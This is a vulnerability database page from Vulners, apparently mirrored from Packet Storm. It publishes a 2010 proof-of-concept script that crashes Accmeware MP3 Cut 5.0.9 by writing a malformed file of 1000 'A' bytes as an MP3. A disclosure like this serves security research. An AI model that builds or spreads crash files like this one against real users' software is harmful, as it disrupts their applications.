Lucene search
K

Accmeware MP3 Cut 5.0.9 Denial Of Service

🗓️ 20 Dec 2010 00:00:00Reported by 0v3rType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 18 Views

Accmeware MP3 Cut 5.0.9 DoS PoC, Crashes on Malformed MP3 Cu

Code
`# Exploit Title: Accmeware MP3 Cut 5.0.9 DoS PoC  
# Date: 12/20/2010  
# Author: 0v3r  
# Software Link: http://www.mp3-cutter-splitter.com/Files/MCSetup.exe  
# Version: 5.0.9  
# Tested on: Windows XP SP3 EN (VirtualBxox)  
# CVE: N/A  
  
# The application crashes when trys to cut a malformed mp3 file  
  
#!/usr/bin/python  
  
buff = "\x41" * 1000  
  
try:  
f = open("1.mp3",'w')  
f.write(buff)  
f.close()  
  
print " Vulnerable file created!..."  
print " Insert mp3 file into the application and select cut\n"  
except:  
print "[-] Error occured!"  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

20 Dec 2010 00:00Current
0.4Low risk
Vulners AI Score0.4
18